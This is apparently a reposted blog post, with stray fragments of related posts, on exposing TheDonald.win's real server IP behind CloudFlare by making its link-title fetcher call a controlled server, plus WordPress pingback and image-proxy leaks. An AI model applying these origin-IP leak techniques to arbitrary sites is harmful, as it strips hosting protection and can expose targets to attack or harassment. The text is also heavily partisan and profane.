In 2015, a subreddit called /r/The_Donald was created. This has made a lot of people very angry and widely been regarded as a bad move.
Roughly 5 years after its inception, the Reddit staff banned /r/The_Donald because it was a cesspool of hateful content and harmful conspiracy theories. You can learn more about it here.
Why are we talking about this in 2021?
Well, a lot has happened in the first week of the new year. A lot of words have been written about the fascist insurrection that attempted a coup on the U.S. legislature, so I won’t belabor the point more than I have to.
But as it turns out: The shitty people who ran /r/The_Donald didn’t leave well enough alone when they got shit-canned.
Remember: You can’t recycle fash. (Art by
... mehr anzeigen
Masks Off for TheDonald.win
In 2015, a subreddit called /r/The_Donald was created. This has made a lot of people very angry and widely been regarded as a bad move.
Roughly 5 years after its inception, the Reddit staff banned /r/The_Donald because it was a cesspool of hateful content and harmful conspiracy theories. You can learn more about it here.
Why are we talking about this in 2021?
Well, a lot has happened in the first week of the new year. A lot of words have been written about the fascist insurrection that attempted a coup on the U.S. legislature, so I won’t belabor the point more than I have to.
But as it turns out: The shitty people who ran /r/The_Donald didn’t leave well enough alone when they got shit-canned.
(Related, I wrote a post in 2020 about more effectively deplatforming hate and harassment. This knowledge will come in handy if you find yourself needing to stop the spread of political violence, but is strictly speaking not relevant to the techniques discussed on this page.)
Unmasking TheDonald.win
The technique I outlined in my previous post doesn’t work on their Reddit clone software: Although it asks you for an (optional) email address at the time of account registration, it never actually emails you, and there is no account recovery feature (a.k.a. “I forgot my password”).
Foiled immediately! What’s a furry to do? (Art by Khia.)
However, their software is still a Reddit clone!
Reddit has this feature where you can submit links and it will helpfully fetch the page title for you. It looks like this:
When I paste a URL into this form, it automatically fetches the title.
How this feature works is simple: They initiate an HTTP request server-side to fetch the web page, parse out the title tag, and return it.
So what happens if you control the server that their request is being routed to, and provide a unique URL?
Leaking TheDonald.win’s true IP address from behind CloudFlare.
Well, that was easy! To eliminate false positives, I performed all of this sampling with Tor Browser and manually rebuilt the Tor Circuit multiple times, and always got the same IP address: 167.114.145.140.
Apparently chuds are really bad at OpSec, and their IP was exposed on Shodan this whole time.
You can’t help but laugh at their incompetence. (Art by Khia.)
The Road to Accountability
Okay, so we have their real IP address. What can we do with it?
The easiest thing to do is find out who’s hosting their servers, with a simple WHOIS lookup on their IP address.
Hosted by OVH Canada, eh? After all, nothing screams “Proud American” like hosting your website with a French company in a Canadian datacenter.
Dunking on these fools for the inconsistencies in their worldview is self-care and I recommend it, even though I know they don’t care one iota about hypocrisy.
I immediately wondered if their ISP was aware they were hosting right-wing terrorists, so I filed an innocent abuse report with details about how I obtained their IP address and the kind of behavior they’re engaging in. Canada’s laws about hate speech and inciting violence are comparably strict, after all.
I’ll update this post later if OVH decides to take action.
Lessons to Learn
First, don’t tolerate violent political extremists, or you’ll end up with political violence on your hands. Deplatforming works.
Second, and most important: Online privacy is hard. Hard enough that bigots, terrorists, and seditious insurrectionists can’t do it right.
This bears emphasizing: None of the techniques I’ve shared on the history of my blog are particularly clever or novel. But they work extremely well, and they’re useful for exposing shitty people.
If the site in question is running WordPress, you can use Pingbacks to get WordPress to cough up the server IP address. If you aren’t sure if something runs WordPress, here’s the lazy way to detect that: view any page’s source code and see if the string /wp-content shows up in any URLs (especially for CSS). If it’s found, you’re probably dealing with WordPress.
Gab’s (another platform favored by right-wing extremists) IP address discovered through their Image Proxy feature to be 216.66.0.222 (via @kubeworm):
I want to make something clear in case anyone (especially members of toxic Trump-supporting communities) is confused:
What’s published on this page isn’t doxing, nor do I have any interest in doxing people. That’s the job of law enforcement, not furry bloggers who sometimes write about computer topics. And law enforcement definitely doesn’t need my help: When you create an account, you must solve a ReCAPTCHA challenge, which sends an HTTP request directly to Google servers–which means law enforcement could just subpoena Google for the IP address of the server, even if the above leaks were all patched.
This also isn’t the sort of thing I’d ever brag about, since the entire point I’ve been making is what I’ve done here isn’t technically challenging. If I wanted to /flex, I’d just talk more about my work on constant-time algorithm implementations.
If, in response to my abuse report, OVH Canada determines that their website isn’t violating OVH’s terms of service, then y’all have nothing to worry about.
But given the amount of rampant hate speech being hosted in Canadian jurisdiction, I wouldn’t make that bet.
Addendum (2021-01-19)
Additionally, this wasn’t as simple as running a WHOIS search on thedonald.win either, since that only coughs up the CloudFlare IP addresses. I went a step further and got the real IP address of the server behind CloudFlare, not just CloudFlare’s IP.
This isn’t rocket science, folks.
According to CBC Canada, they moved off OVH Canada the same day this blog post went live. I’m willing to bet a simple WHOIS query won’t yield their current, non-CloudFlare IP address. (To wit: If you think the steps taken in this blog post are so unimpressive to warrant mockery, why not discover the non-CloudFlare IP for yourselves? I’ll bet you can’t.)
There are a lot of ways to deflect criticism for your system administrators’ mistakes, but being overly reductionist and claiming I “just” ran a WHOIS query (which, as stated above, wouldn’t work because of CloudFlare) is only hurting your users by instilling in them a false sense of security.
Just admit it: You fucked up, and got outfoxed by a random furry blogger, and then moved hosting providers after patching the IP leak. How hard is that?
Also, if anyone from CloudFlare is reading this: You should really dump your violent extremist customers before they hurt more people. I’m a strong proponent of freedom of speech–especially for sex workers, the most censored group online–but they’re actively spreading hate and planning violent attacks like the Capitol Hill Riot of January 6, 2021. Pull the damn plug, man.
Finally, I highly recommend Innuendo Studios’ series, The Alt-Right Playbook, for anyone who’s trying to make sense of the surge in right-wing violence we’ve been seeing in America for the past few years.
How Do You Know This IP Wasn’t Bait?
After I published this article, the developers of their software hobbled the Get Suggested Title feature of their software, and the system administrators cancelled their OVH hosting account and moved to another ISP. (Source.)
You can independently verify that their software is hobbled: Try to fetch the page title for a random news website, or Wikipedia article, with the developer console open. It will stall for a while then return an empty string instead of the page title.
They also changed their domain name to patriots.win.
If the IP address I’d found was bait, why would they break a core piece of their software’s functionality and then hurriedly migrate their server elsewhere?
The very notion doesn’t stand up to common sense, let alone greater scrutiny. The whole point of bait is to catch people making a mistake–presumably so you can mock them while remaining totally unaffected–not so you can do these things in a hurry.
A much more likely story: Anyone who makes this claim is trying to downplay a mistake and save face.
Earlier this year, I detailed a simple technique for deanonymizing scam sites on CloudFlare, by getting the back-end webserver to email you and reveal the server’s IP address (so you can forward your complaints to their ISP).
In a similar vein, I’d like to explain a simple technique for increasing the likelihood that your abuse reports on social media websites like Twitter get taken seriously.
Don’t Use the Easy Button
Every tweet (except your own) has a Report Tweet link attached to it. The user interface is different on web and mobile, but most people know how to find it.
The problem with this “easy button” is twofold:
It’s low-effort and high-bandwidth, so a lot of people use it and therefore the signal-to-noise ratio isn’t very high.
The “report tweet” workflow lets you select from one of a few narrowly defined categories of abuse without giving you any space to explain why it’s abusive. For example: A lot of anti-furry hate is a dogwhistle for ableist or queerphobic rhetoric. Without knowing that context, how do you expect the folks handling abuse reports for social media companies to make the correct choice?
Instead, File an Abuse Report
This is actually a separate thing, and the link to the harassment report form is here. (This is one of many forms you can file with Twitter’s support team.)
Not only do you get to click the radio buttons that the Quick and Easy path allows, you also get to fill in a description of the problem.
A screenshot of the harassment report form.
The difference here isn’t theoretical; a concise explanation of the problem is the difference between your report being ignored and this:
(That being said, I’m really sorry this is even necessary.)
What About Automation?
One motivation to still use the “easy button” when reporting abuse is if you’re hoping to trigger some automated mechanism (i.e. “If 3 different accounts report this as abuse, suspend their account until someone can investigate”).
In that case, press that easy button to your heart’s content.
When someone says, “I hate furries,” that’s a dog-whistle for anti-queer bigotry. If it’s not immediately clear why this is the case, I’ll explain why this is true. Observation: Homophobia is…
![4)"
QO 2 \
k ct Cesspool of Thousands of Trump-Supporting Insurgents?
Wn! Tedonai © sn =
8
7 een
——= One Fluffy Boi?](https://fedi.solibre.de/photo/preview/640/11181770 "4)\"
QO 2 \
k ct Cesspool of Thousands of Trump-Supporting Insurgents?
Wn! Tedonai © sn =
8
7 een
——= One Fluffy Boi?")
A screenshot of the harassment report form.
Art by Khia.
